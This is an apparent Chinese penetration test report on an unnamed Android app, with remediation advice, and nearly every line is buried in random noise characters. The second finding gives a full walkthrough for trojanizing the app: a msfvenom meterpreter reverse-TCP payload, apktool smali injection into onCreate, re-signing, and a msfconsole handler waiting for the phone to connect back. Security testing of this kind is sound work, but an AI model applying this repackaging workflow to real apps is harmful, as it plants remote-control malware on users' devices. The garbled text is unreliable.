" R2 l/ q# k: l" d3 d # m9 @$ c9 L5 V& X
9 p4 T) r& t8 R2 H + ^+ `" f# b+ \! L2 @* f& M
( m) ^3 J+ _" n# T' }
# R5 A/ \+ Z6 f# A
$ _8 L$ t0 S$ q 表1-2 测试结果
$ O& X. ^( K% B7 x
/ t8 Q" A {9 d$ B$ Y * T k' O! n2 A' f
" q' X" G0 S {) s
7 ?* y, c/ `; ^" d% y$ |8 z: R5 X A, r4 g
5 C. ~. g' w% [8 ]
b, B" l( p8 G* E# H; K$ e( c) z
+ ] W: z% k2 X1 h! b6 b9 `- {7 |9 K" ~* Y% i d, H* ` M
/ q' o+ ~- g2 n) u7 y7 I" X: ?( A4 ~- t
2 检测结果
. D2 q/ j2 H J; t% J1 F5 v0 ~* N2 Q& m1 |
) W: G8 K$ `/ n5 D# D3 }2 O8 C5 ^8 L0 X. {- Y3 V3 u4 A
# x' G" |& l) o
) I p u0 u6 r8 j. l 2.1 某某某 4 d: A) X: o# v% C: v: F# e! }+ Y5 Z
! [* o, [. E$ N
+ ~6 X: H, `% y2 u" d# {
+ C: v+ N; L7 N& u+ |0 R J ; `6 J% m3 o5 o6 |' Z
5 w1 S! G: T, _! S+ N 2.1.1检测目标
* q0 J2 i0 o, T) e9 L: \4 Q, N: \4 o# X& Y V& y
' C V5 A( ~0 ?2 [! I6 l
x6 i. Q% C, B4 o9 L4 n: f% h
- }! `& R5 j/ L& a7 D8 \1 `
$ o" n, \2 f. l% V3 u 目标地址: 某某某某某某APP
8 g, s: b( N- ~6 `! w
$ R# l9 r3 ]' V1 b7 e% Z
" `0 W( X6 m0 @$ f3 r( K6 H0 }7 n: k" l) i
$ Y5 |. p& l8 U( P3 R5 G& p
! ~5 T' r8 k. Q
2.1.2检测结果
7 n, W5 Q+ `3 r+ d7 l
# v; v2 ]. v" p" a# C8 p / f6 z, g5 F( F. _5 h
2 _5 u% y# d3 J! w% p& g: G1 Z 5 e1 c3 {% q* m
{& I7 P0 K/ e- X" W" O( K* K 2.1.2.1 9 S" a7 a( h# p- h
8 T7 V9 w3 l7 _
2 a ?' P: S) L# Z7 D- j
: o0 S. O/ G) ?% I8 a
! E: F7 o8 I5 ]( M# i8 \) u' w" Q' r4 w$ X
漏洞链接地址:某某某某某某APP
+ I# Q, u l9 `% a
6 b! ?# Z5 ` H
$ a# V# E% z: r, N9 {, i" O; \, \9 r5 T r
4 f2 X1 j4 W2 q; q) m
/ M1 e# z% k7 z/ R+ m " P% l: ]4 B$ e5 O
+ @$ c$ H+ P' \6 l M& s1 F ' G& i1 b% n' C9 t9 l2 B
4 |( M5 N; o3 X/ ?- x; v6 s
g# p7 `' @- j$ |; X3 ^
2 H6 L6 H4 `6 [' j, D) N; N
漏洞分析及取证: 2 V8 W& Q1 i# H( t e% M) N
1 P. G* V7 d* }7 t
4 ]+ u% k" q. i. U0 b* \4 f7 D4 m G+ N3 |1 A
+ l) w, K5 [) t3 Q! I+ i! I- X: k4 u8 }* N" q- H
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: + S% @8 R$ v' F
; p1 y" r/ Y6 |: z% Y' o) }9 r
* c! C) o7 o* V/ H$ E4 v
- F+ c% E" N( z) m+ ] 9 p* q, I. I: y8 ~! p! F" F
2 b2 `( r$ C/ `* j) ^' E% k
/ `* j b" P, s
1 h/ w/ P4 p4 `( f' x( G
% c b# }8 J, q* ?! H. `: Q7 t' k8 D6 p' F( W& A& H( q
" W% h% X! y) b# m" P9 i3 {
7 i8 ^" N; f" Y8 f/ _$ _
% `, n; P( G6 h% X7 h
0 m: K! q% `7 }. g$ K1 [ : f( R' k/ y% `9 K+ B8 E
& N) L, G k! o" _
8 p, U7 w* ]' z9 E- {8 j
( G1 A" O1 h* G. @( T% w
1 Q/ A* s2 t. ^- _$ i! G& r1 z2 I& l
1 I! v3 s" ]4 v5 O+ V
! U, A9 V# I; z5 i, B
2 N5 |# z ]9 k- s e& { ' ?9 b2 B) Q# v( P7 _; J! g
' e% g8 G4 n( k5 J5 q: C
3 i) W. m( r7 C6 R5 r' N( E! W' q" v; L# ~& I; h
/ E R0 }2 O2 Q
# s$ d: q$ T/ G, A! E
9 E& y7 ~6 j) \2 I
3 i4 `/ H5 y; C+ b. Q4 X, K; @/ ? 4 Y/ J' C" f+ W0 U
* Q7 B9 v# x9 i' q4 |9 s
# Q, i. }" l2 j9 D- H5 u
" m2 w/ U- o |7 A t2 {; S, b; w
! K1 P- s2 G8 {& L
- Y9 H( T1 E) } s 漏洞危害:高 % w2 }7 o8 f1 F& `6 o4 |; j5 d @
3 E3 K; W# v* O 7 s, C: F6 `5 P D" q% L
* ^4 c9 F/ |- |
0 Y) z4 r n. Y6 N7 @# Y. A/ o4 u0 D1 _4 a5 l! M
+ P* B7 F9 k8 D9 t6 J3 ]5 a, L1 A+ d! h7 o0 q- L1 u
: ~% t4 X, J( i8 @) }" M" C( Y
- M) _6 Y8 w( b* [9 N0 P
1 I: r, M, U9 e8 H) U
9 ^. P$ I5 k/ ^/ t9 U; j 2 P) G$ b% c7 h0 U
/ P% `+ W* q* h: @' Y2 K
2 F/ S6 s! \$ K; [! h+ J
8 t, b# V) u0 @) z$ X% n1 X# K9 r 严重程度 ) O. f0 r2 a, O6 S( \, S1 g+ W
: v f3 V; j2 `8 N
! A* h3 w7 H) E) a1 K* F6 [% w6 |7 a6 H/ ^
| 6 [% W- g* \) K" Q* y- t
2 X1 _$ S/ w, w) E
( b" z3 _) w' J. t4 t, c: g8 o
; i# h* s8 |; L ( j! j5 d w; A$ P) X# Z3 p
6 f/ d& Z d$ H1 q) r+ n' s 高 " M9 q5 o$ }# U; m8 Y
. v& t. g" T& q- o' o p
! @" R$ ]' k& J: F! p
! x0 L% x4 I+ [, a( z" [ | 3 X0 w0 Q! f, ]* ~1 a2 p
+ ^ m' z. I/ z; z& m
; j2 B, {8 T9 j/ a5 W9 |7 _0 m, N/ i# X' t" F7 |0 R
" q, N' g9 j8 J( x- Z( R& V- X% ~' X8 z; z4 X5 i2 S7 p
■ ( H4 _" L5 [& O; b1 ^: B
1 U5 y% d: }, J: N9 Z . l/ t: g; d- R! n
& t- |% Q4 \- c0 r" I" a: t
| % A$ r# l' b* h5 q9 l: {9 a
4 E* U; n# [* ]- {0 X. y7 Y
' T; j5 v* }9 L! e- z
3 g6 }1 o: g) j8 `
* Y" I$ F: k. e; X" C; H) V6 M
$ |1 J# D) Z- x4 V7 q$ Y8 J6 J$ ] 中 ) g- P( I" N4 Y3 n0 h z" E. [1 w
1 z+ W8 [' `; u2 V# _
0 n; Z" _$ a4 ^* c/ M( B# }
' Y% e9 c' D) `! d' e
|
/ ^* b1 T4 g& W& C+ P9 j2 e
/ G5 x9 X/ D$ q8 B# F! H
0 p W% z6 ~; {
3 l v! e5 p' A7 p, e, m0 c2 _
8 {% J, ]0 ^+ u1 a# w7 D
, @; v8 x- ^# w2 I) t P7 X8 v
# T& p2 ]8 H5 ]+ w" ?+ S H/ k- S' t1 [9 B
x/ [6 o. Z; ?0 M% z+ c( l- D7 r8 m3 K* {5 s0 A
|
! i: p5 I" o$ q; b$ W! {, Q" L4 {
9 u) j4 s) c5 S
: k& C) X- J0 M2 T y8 J# S% {& L6 q( p" {2 k+ A% @ S$ ~
5 C1 E$ Z( E" ~+ d. {4 }+ P [/ {) V, U2 K; s+ {
低
7 O; ~" _2 q; X$ [8 e
! c0 A0 z5 o/ M; H" s2 j0 l4 @" t
) K' p- o) T" c( f' n
* t* l1 i5 |& }1 i" \, \* V5 J | 2 f; d4 `2 \6 u. y4 s
1 ` G9 \1 a: N* O0 o# M2 a
5 j8 U8 _4 m" q4 E" R
, g# M1 l- i& t" \( A 7 @' e8 o' c3 o2 F4 u! {7 d) w* i
0 D; {; h9 @6 A$ F7 q
% m% x* K" E2 N- s
' |( I: p( t) N! c+ |. a7 |2 M2 K
2 Y$ j5 q" U/ Y
6 {) q" K4 U9 B1 o" S | 7 ~6 n/ M# `0 i( f
6 S" \- x& Y5 L! `, L
c& f9 w+ ] W) z$ @: K/ J! |& W$ G: E1 @2 Y' {
1 D% K( K; L( N1 b
0 Z7 n ^- F) K1 `/ Y% b! _ 9 x _7 e K5 I2 T0 U3 D) U
( x# ]; C- o8 f2 o5 D) L
7 X' D; D1 \; ~6 Q8 i# h, ?3 P4 W* V' s* c
9 m0 f. h% q" b/ S# z3 Z3 q
$ o2 X5 Z( t. K0 `2 u8 ]
2 @. u; s3 [9 x6 M6 A$ F( b
! U2 _9 L' ^1 o1 e4 Z9 k3 D
; [1 i* J) q3 \8 d% F
! }4 ?0 r4 U9 p8 O7 C* Y8 k$ z; G1 B
" [0 x$ [+ c1 ]( n
+ H- n* J; e" f$ g 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
) @; y5 e( [) ]$ `! i( F
) C: }" s# f! s. B3 X5 h : o L2 {3 O4 M6 `' ^1 g% n! c
! v6 [2 P$ x! o7 T& |: M 7 Y5 X; w q5 H( ?! ?; d
, y9 m' a) d+ o ^! z. U: u
6 o {. F" r4 N$ X5 P% q. L
C2 Z1 {2 \) ^% s0 w6 _% P a$ N. A7 s; R/ [0 B. {$ V+ L* S) z
D; k% E" u' D
+ }( E4 g! r6 }
9 z" _' ?5 o& g' c2 t" p, z " @' `; |/ B3 n2 V8 m: e
: s" n5 V5 v) q0 t
! L5 y+ [2 ^% H" }
3 J" \/ {% H, l1 i2 m6 d! x
! x; d: e. [: ?$ k* e! t/ C3 I) _ o2 J, M
2.1.2.2 . f \( ?* G3 x9 W5 {- O g/ g
* \- D, g# q1 Q5 S! ]$ q* c0 Q; s
7 ]3 M# }8 j; m: n5 g" x J& O
0 x% J4 B# X4 ~2 x) z
, s; h2 B& X k% F- F
漏洞链接地址:某某某某某某APP . ^7 N% c/ Y9 f: E: Z1 q+ n
. m. f/ H0 G5 F6 s" P& i
" t0 k/ I/ ]1 ^6 G4 s0 U
; I: ~- p, U# m( ~; ~ 7 I/ y0 m V! S5 x; C) H$ A. p( b: Z; s
1 D, }% u/ b/ R7 | 漏洞分析及取证: 6 I0 t; c. w e% _. _
$ \( D5 `+ U+ q- w, _3 k% y' r
4 s! I0 A6 d: V- e: Q/ h! v, `! l3 n' t
$ J* l+ v& s7 Y4 j: o1 e4 d3 f( t9 J$ {' s! {8 e
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 z8 U" G3 c" D# h6 g/ I
- n1 M+ b4 C8 Q" ~) z/ [
! z1 ?, w8 ]6 E4 q
% n2 A& I- y- V+ T' h1 i% ^" |
4 D- J9 d" V+ v" X- t# `
! d$ U! u- h/ v, v' V7 z J5 T 用Metasploit 生成木马 apk
, C: ^9 \9 E7 R! ~) K, R$ T3 g7 e+ H, s, q; o& }
- G) ]3 s9 w( @2 R5 {
2 Y. _5 k1 D/ ~1 ~ . W( b2 K$ ?$ x* ^
4 q+ f- `9 o( j* ?- b msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk |- x( w/ W/ E) I
- `! N, s, X! g, y+ Q+ ~+ K
5 V) Y. U, _+ q; f( S
, @ N% }+ v' K8 H: }! l
# \; g1 F" t8 u- F, s# o) E9 M7 B' p' n
反编译目标apk和木马apk 6 l& q% q* { W. k5 D. ~
6 r( D! u9 `+ |) p" y4 { 2 G; ]% X; i2 E `; Y% |$ e: D" }/ s
& K- E# i. V7 D& d
& N8 l/ q$ T1 C; I3 X1 R. U
6 }! J1 A8 F- n i" v& n p! x apktool d target.apk
- N0 j2 _6 x9 G
7 m; C' U) G9 \; r. I& i apktool d cockhorse.apk ]8 s6 a* u' ~/ q
0 |+ Z4 h7 }+ r' [
. q7 m' R4 d$ F( K) h! y
) z7 F) e1 W2 Q* L 4 N; i- G8 S. m0 g2 ~! P
" `! z7 z& w. \( r. e! v
木马 apk 注入目标 apk
0 A7 Q1 R5 n) Z2 v* G0 ^6 }/ X" e
& m8 [: Z5 x v. b; c; m" F
@" p; f: y% k4 Q. S0 A# k" b. C7 Z# O' |$ m
' G! k9 G" }# n2 I, i% E- {, t+ u) y' ?
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码: . S$ n- ~' L" j! y0 ^
: ? z( C' G3 ^: k* b invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V : t7 T* B( a# t6 r/ e" B
: x5 F5 f- Z4 n
; b9 \- h, Y8 h
) M; x3 Z$ T9 v# Z* e- L
1 h$ n( ?" g5 G1 Y: | {. Q( j0 k
" m. ] A2 N ^4 \+ E$ _( l$ [3 G 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 7 t: n9 S' J( n0 G8 H
4 B( W/ j9 N/ Y3 n6 o* _, i# `
' l- u! C0 r/ \" J0 v7 \! C4 y. F; [
8 J' D1 s9 A+ a2 J
7 U3 ] h/ d) s9 d
7 ]5 X( U+ c$ R2 P# k/ c2 W6 E+ Y# I6 k X 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 8 p3 |- \3 u3 `( y' L
- @$ E9 h4 q9 k6 g3 ]
6 N) ]% g7 K; f7 d- j$ e
* e, `" a3 }3 a9 d9 t# |3 Z) A& A 7 B+ k G6 h, y
/ H" ^+ `" Q. L8 n5 C 回编译生成最终 apk ' S7 I" v3 M5 P
5 N/ I, V7 q* }, Y2 ^6 `9 T, L/ d7 Q
# d# Z6 `% i' V; k& H# W
~( r, `- I9 d& f+ ^ ' [/ x6 v: H: l
1 w$ B8 y8 B# J* |5 C7 @- { 重新打包
7 x, u) t* e4 B/ f5 `9 Y( ~% ^; A0 `. X3 J3 K3 I
9 w* g; |! C1 Q( ~+ \
# t! [( W4 R' D$ O* d7 x7 L' W4 a , P$ m# L" F7 l' r' L
7 Z% ]$ L1 ^6 u apktool b -o repackage.apk target_app_floder 5 u' f3 A/ V. L5 R C1 E
" ]) Z' {5 i3 y- S. Q1 e ; L4 [6 o9 _% V
9 e) x7 o0 X% ^
0 f: b+ \9 ]8 @ p0 G$ U
. [4 f8 l, _* ]8 `! s 创建签名文件,有的话可忽略此步骤
' _( H" k3 a, ]/ S, V4 C( k! n( |
V1 s+ U' `0 w H* F
: ^- l, V7 N" t7 ^3 R
0 h4 i6 k" ? i: ?0 A' P" K3 P: u9 r6 L2 s" @+ c9 b+ p
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 . q7 \$ [ D1 v' |9 S# C
+ d, q$ y+ W4 m/ _, o
3 s/ y+ ]: P$ Q( K
& U5 w& z/ l4 }, P" D. C3 j
# T* y4 h& ~; w, ?% X N' L
& Y# f; {5 p) R: r) ^, A. S 签名,以下任选其一 : ]6 T: Z& z* V1 M1 ~' k# W
0 d6 q7 q( C4 ~$ y5 [; w
$ ~: R; {& F2 Z- k- O7 c5 A
0 t2 Y; N; z' \5 P4 N. b9 a) `/ C 4 F" A- W, k2 T% V
( p# s' M4 C5 @ _$ X& M, D jarsigner 方式
' t: l' m5 F+ z6 }: g3 k" ^
7 z0 m1 U1 F2 h9 c; b , {6 I' d+ x; d b% U, C
$ C$ H; I7 w% K2 v* K
5 m- I0 D# g" n+ @7 |, S1 A3 G5 b( L3 [; k0 L+ `) ^8 R# q( B& e
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname $ F6 F7 R) u( V' v, ]. i
! b6 v* `5 V0 S7 t3 j! e 9 z: }9 l$ [ F8 H% m0 W5 {
; J$ }: P% {6 q8 ?8 b
# s6 ?; _3 }6 c0 Y& R
$ \$ w4 O$ X3 @0 H8 r
apksigner 方式 9 O) e& V$ Y5 V: | o
9 c5 y7 Q" x6 P& w0 x
D9 O6 {& h! n, G T( O/ ^5 ?0 ^* `: Y) r+ g& t7 W9 t" H8 D* t
! l) _ R# S; t2 ]1 R5 K0 \ c
0 T% d8 O) f. Y" H apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ; F* X1 z" e+ ]- E2 A6 z
+ J' T: {6 j# Y+ e3 W) Q
! s$ Y' V b: U$ i) I
: q5 l. k3 B9 [8 R; b% x I0 w ( h, O- M9 ^5 e) e) P2 ~$ [
6 e) }% o) N1 A 如需要禁用 v2签名 添加选项--v2-signing-enabled false
, R! b4 t* N4 M& U
/ _% f4 Q' ^) `- p" I+ U ) X! z0 y& H! `* l }2 d: N1 C
; K! ^8 B' T) }7 v0 k; I # M1 \' J. |7 y) `& X
! D) ^6 j: o9 u6 ]7 z$ n 验证,以下任选其一
4 N. o# ^2 Y; g; L- w& |2 O& v/ P- x# L! f5 C: t
+ ^2 K* s$ T/ @: {8 U6 o7 J4 d7 B$ u- J( ~9 e2 X0 o! k" X
- @: Q* U3 J+ f3 c- E, e6 @8 {
/ y2 Z* M1 q9 I& Z& K9 u
jarsigner方式
( F. R$ M: t( t; h- j8 J( d) f. D# W" B9 H9 e( _ ?
: n3 W, J- H- }9 x& p
- W! m7 W* [$ x' }2 N$ f& T8 g
) m/ F+ v! V& o
1 J; V g4 M6 ]1 x. u% O- j9 i1 o
jarsigner -verify repackaged.apk / p+ I; E( j7 B4 x
2 g2 H3 ^) N3 \2 c, b& j$ D+ W
* \, m. _) ?; L9 F
- `4 ^7 `% ]6 d, G/ x ; x1 k; M# h7 X: Z' X o( b
' t; O* {1 l; K) r apksigner 方式
; Q6 s. u. u0 r: A; D
/ e/ X R+ H% e' M( z" |. j ) M, y& A4 W% b# d6 _* G
. M9 K" U( g, W. I' F
. N: E) A! Q+ B% s
' d9 h9 o# E; ]5 C1 E apksigner verify -v --print-certs repackaged.apk : Y7 Z( e$ m B ?& I I
) j* X! D- S7 r
- d3 [. }0 x5 A8 a9 Q( A3 I! F- @& k/ G: K- |" a3 `
- M* M& ~& M* R( u! o$ q
& c& N9 o/ q2 M keytool方式
9 K+ Q; K1 s: D- M7 H" [) R3 W$ \: a' I6 U( y4 _1 W
% r+ H0 M% r5 U0 `8 |3 ~
7 M, P; o2 k ]; o9 U: B
5 V- i) }/ l! n8 k: p. A# a8 S$ x2 T, s: S1 ^) y) W
keytool -printcert -jarfile repackaged.apk
7 u' K3 C% r$ L. ^, e. u- ?: v. w5 H, s+ P& C3 I) ]
) @; S3 |! z3 p# X8 ~
6 _! Z# J1 q$ j3 S # _. \& o3 e, [2 I4 N$ }: o
* N. P8 ?$ s) t2 n$ _5 ]# E1 k% q 对齐
. i g, a1 i4 K: V- y! j0 c) \/ e( ^% M+ B
2 [% F0 H5 \7 s* O( x! J8 U% ]3 v
/ q. d4 F; ]0 D+ \
+ b2 D) k% G. ^* Z2 B4 ~& W4 @1 y& S& d; {) u4 F- m
字节对齐优化 % F/ H& x& }& p S7 W" z
( X$ T4 [- z$ } L, N9 T& h
{% R9 G& e/ d8 m/ m/ }' K/ N
, Z7 A6 k( C2 h , A3 {- ]# E6 B" _" F- J9 |
: g2 h5 z6 t" z- Y) Q
zipalign -v 4 repackaged.apk final.apk 3 `* ~8 X h% L) }7 T* T! l
i5 v$ W; y( f8 P& O
/ c* z. R& a: ?1 d/ i( H0 A8 _5 ~ J# |
) H% ^& L- s, p+ L+ l
a1 _( _/ l9 w8 E1 f
检查是否对齐
+ x) \" @! I# f* E! _2 c. y4 H; J+ ?% N5 S; b# j
1 D. k" K% E: I: @, r8 b# n
. V* F1 M/ N( J$ ?: b
0 O: H' w/ v( [1 V) j m
$ x. G! z* ?/ |! S" U v zipalign -c -v 4 final.apk
6 B& V$ K# Q' E& D; ~- d1 ^8 `1 r) K* H: I, Q( u! o1 m
6 O" n% v8 j/ @) p' |
5 y; D2 \0 q0 o2 F5 m& j 3 b7 j' t- C! Y
P c( z) m b) ]! [" s9 Y$ k* M 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
) g! q. x# [/ V( C+ M% i% E; T, C. H- p( L
0 g, ^, F# G+ [5 q8 X- s
0 M! ?' @1 x* ~ ) D/ w: O" S( C
8 I( F9 o* q- p- G6 i6 M0 m5 i" {1 j 启动Metasploit控制台,配置参数等待上线
: G+ p! o4 y8 Q* i, L
) k6 P# T$ x7 q8 S) M
$ ]+ L1 P; B5 M% z5 _3 B1 q6 u2 q r; q- w* r* \* N
/ Y) p1 t( C4 f+ @7 @/ y
' m* M' Y2 V) Y2 G, o5 Z( c 在终端依次输入如下命令
5 u" S3 w. d$ Z% m& r* u5 |+ r; p! O3 u5 N% B$ h) P m: y" g
- l. _1 V! y1 R, d& A
0 R" V2 @0 S, D+ ^
5 p6 D0 d. a x& o) Z7 G$ S1 t3 K2 ]& c2 U; A
msfconsole , E$ ~% {5 e) ~1 ]. X9 g
+ D; o4 W* e9 K; h& X# s# m
2 R+ `$ n( Z: z
' I& F; ]1 Z/ G9 t* [; d2 y9 K: |9 w3 H
/ J$ ]6 ^+ d# h- T3 ~/ a- p
\: c3 l# [" h: E% i. @ use exploit/multi/handler
8 E% l) S! S q2 f# |7 q5 v& g% ~
7 l6 X8 z, _# Q" J* ~! L4 j2 _
! p7 c4 b8 [2 ?( }6 Q) w* ~6 l$ e' k% h! X0 E# E
5 N! R. k" ~, t9 Y. z# ~
, b, V/ d: l- I8 y( v5 l set PAYLOAD android/meterpreter/reverse_tcp 1 T3 C# P6 e" I" g3 h9 j @
4 ~' J5 ]$ B5 @" p* y
8 Z" u5 [3 i5 I! K; X% B. Q: P0 K/ D$ L3 S
- n' P% b) ~0 z" r. h8 A9 x8 n' A: n
set LHOST 192.xxx.xx.xx
0 I$ A% {+ B" E9 z/ X D6 i4 n+ P% }2 @9 F. W6 R; I
0 K- C+ X/ m, a
9 K( \) u( ~, c- ~/ ? 0 Z) J8 v2 T5 G, m0 _7 l) C6 H+ }$ s
9 K) g. K( z7 o. y2 f: q% r/ g
set LPORT 4444
3 m8 r+ `, R7 N4 y" r" \' ~
! l' O7 X p6 `9 r% b9 m
' f K% `* B( l0 \, G" y9 i& F' O! _7 f4 n
5 \2 J1 T; @" I) E
( c/ b0 Q% y( p7 o, \
exploit 2 T4 _7 i1 @: V1 k" G: ]: T
9 s3 n" J/ w) ^; W: Y' u3 I
# d5 e0 h0 c5 A
; j0 Z1 D3 [0 P) Z ( H1 l9 G0 l. a$ s
7 t& q2 i; v# M, K/ e! a 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: ; i. P' b- P/ D' ] w; ~0 k4 N! Q
8 {1 v" y! O& G: Z1 Y' z
) E: S5 U) t* K* `6 N& O/ y8 }0 {
! ~- J1 E4 ^% s9 u
( E7 I( g8 ~* z+ b6 `5 Y' `, k
, h3 l8 T i0 s 漏洞危害:中 8 u, x. q! @9 N4 u
3 [# m# j: g% o6 {, h0 g 7 }6 h* h8 x' |; _. [
9 a5 l( V: E1 q0 ]7 Q0 ^
- l" s$ q( \" i9 x) H! U! |' g
6 D9 R1 h3 T! `/ c; _' |- Q
/ c+ B1 v* X; w0 h m8 l7 C4 B0 j* W# _ W" Q/ R
$ W0 q' b' Y4 M G# O4 E4 D O
6 k1 \8 d( R3 s: `) s* v" F
& t8 M* C Q# s
1 e! ?5 r6 R+ _/ X! y1 k. l/ s : K. Y, W% ~ Q! O
; o. ?2 M" Y* j! N) M) E " n, z& k8 B+ L8 A
' W5 q7 B5 q* I0 Y7 K& k& ^
, @1 k, P, d* p
1 N- I8 Z3 g7 j3 w- O* R 严重程度 $ x% e, D8 i+ e% g. ^* k5 J Y# @
* U, t" N8 z0 n! Y& O: v1 b
. ?5 i* o4 u6 d# s, o
/ R# J! w/ u7 {+ O5 a5 V6 N0 b
|
4 l) H4 [1 @8 ]& ~/ l8 t! { O1 r" G# ?" f; x
) Q N3 }6 ?) y |: t! i0 y4 J8 t( I
& K+ w; {/ }( [# |% W; D6 Q% @( H
. u- B) I6 P9 F+ x3 n- Z
" i1 }: c9 G9 L2 x4 F 高 " t% z. i! A! G' d& h M3 `
. w6 Z5 C- e. Z0 v / j9 g, [4 z) Q+ U% n2 F
# P* R Z) Q- d; l5 ]
| ; d5 u& y: z# q6 K) a
( T8 W% C- w/ T- x! p , g# ?3 R8 p5 A. Y2 U; n! {% H# h
. _& S# p2 } ?/ |6 t$ H. @+ b
' z( Z/ l# I% b, @9 O- ]
" }8 t2 V, |: w& H, Q$ m ■
" m+ y3 J" m( L7 f6 y3 W
( b: a% l% M; v; o" ` 4 P, ]( A0 S# @8 I
3 X% C9 B7 b6 t- W% t9 o5 T+ B& q
|
5 m9 r5 H# ]( \0 |
S3 M9 H/ U2 y- h/ Z0 Q0 L # S3 w. K# w0 ^. `9 `* A% k
, u8 n; a, L2 n9 Z3 _: ]9 }& `; ~+ z
+ g. J# ^6 Y- A: S
) |/ { S: ~4 r* j4 d+ x
中
5 y8 L {5 A0 v# P" J/ ^+ B* C
6 D. I; o( ~+ q$ ] - s' @* {$ X6 }' w3 D; {2 H1 p
+ Y2 d2 L9 m# K( l. a& |% {; i | ' \1 U0 Y4 l& X
& [8 n9 e, H! M, Y
3 I# K2 g, S" w6 s
0 y( J' ~2 S( R
) t: o6 H$ b8 X1 Z4 w
$ ]( s/ T# e. K6 G3 z F2 R+ m+ V% b! P/ e% L2 P s$ A! {
! {6 f5 |/ c2 b, W
0 |) [2 w! F# \) q7 j: Z
3 j/ I) \4 D( T" y( k3 l
# I/ j: _* I3 M0 e2 j$ o U! U' V6 o6 E8 P7 g x- t
|
3 ]# g0 A/ w' [! n$ C# R3 k3 U: v" c# \, a" c% ?/ ]6 J+ u6 V
8 H R: ?8 G! G% ]; o; O( ~, P& j$ X! \' N$ Z0 B
) B! o/ f5 o; @) J! U9 w- C
% x! \6 H% W8 |/ I 低
$ u+ }* |/ C" g, X. s* _- [. [6 [9 x$ \ P* \. A) n
" e4 @; d4 E1 W( v0 z# `6 T6 Y" a7 `" Y5 \
|
& y3 `- t, v% _0 k5 D! a/ s2 B/ R/ G9 A/ z2 t e3 n; I& S9 A
6 j0 [2 E* k/ X0 {. l- Y; q" K, u4 S1 h) X2 g& s
/ \ `5 l- s* q" {/ J, F$ w& H N# `) _0 e4 D* }$ v; y8 W: J' k0 L0 n
0 J( a# r$ t# A+ J, e# B& Q2 p& c5 H" S, c; N% F
$ R# n3 m- @7 Q/ V
3 A6 v$ u' U: _- ] " W. Z. l" O4 y0 O
) l: M* r4 ]& z; o5 m) {
| i8 s( {+ b8 Z* y) W) L4 P
% C7 O: z6 K- D/ p
6 ?+ G- K5 H7 L( I$ G8 b0 S9 Q1 n4 Z6 G9 R
, T# T; h4 l8 e; a, N# ^% C# C E" i3 R' s
& T. n$ l! B8 o) n. M# w. C
$ z# v5 ?3 @: D$ D v& k
6 x# O% ?. \; j q3 Q( ~ @. @
( R D9 `9 U0 N! {, z
6 f& `' f* J" s, t/ P! X# x5 U, N; A1 c; p% ?
( [. [3 t8 j4 w+ I/ Q5 t7 n' z0 {
! {$ A, }8 ]8 T! { & t) `, t8 ^ q% i8 j
7 w1 Y0 [' B( C7 h $ X* Y( t' e, @" H
* x% ~5 N; ~0 W- h- C) N8 @ 修复方法:
m6 r2 n' p7 e, D$ H- i+ w
+ W: e; ~) j+ O9 A' ~* R. \- x
) r U3 x* B6 C" ~ U0 m; V. I
& F9 {$ S1 s$ y1 d" ]' _% c
" b, n) ]7 n. H+ l; |. t' B* K3 B/ P7 t8 ~1 g
1.在 APP 启动时应做签名校验防止二次打包。 b2 p6 e1 L. I
5 F/ s, Y! a* C 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
* _( ?( N* G1 b' @0 r1 `: j5 O. ?! j/ [+ B6 Z( o
; ?8 S: N6 [) G7 i* Q. L" G4 c! h/ V6 |
+ F, o8 z* _" t h1 \/ O
" p, r$ l! M/ c6 P1 z2 Y; R
1 h D% B o6 J/ G5 E9 \
, ]1 y$ _2 t, G2 y
k$ y2 ?3 ~ A" c6 d) k
6 l2 p7 _8 y+ }7 `+ s5 L3 _
! ? l9 A* R! t/ P$ u
0 |+ c( u0 V6 R8 ~
# ^4 K2 d" _, h0 D' d+ P7 x* l1 u l: g i8 K# J
, p2 G3 a T, ]9 H$ d& r
( u& I- h* |4 s
+ r1 o# I) E6 f1 L% U3 e7 M R; M8 A* v1 }5 G
7 f- C- b r$ ^$ A2 J5 Z
q3 H7 n6 ` n& |6 \ |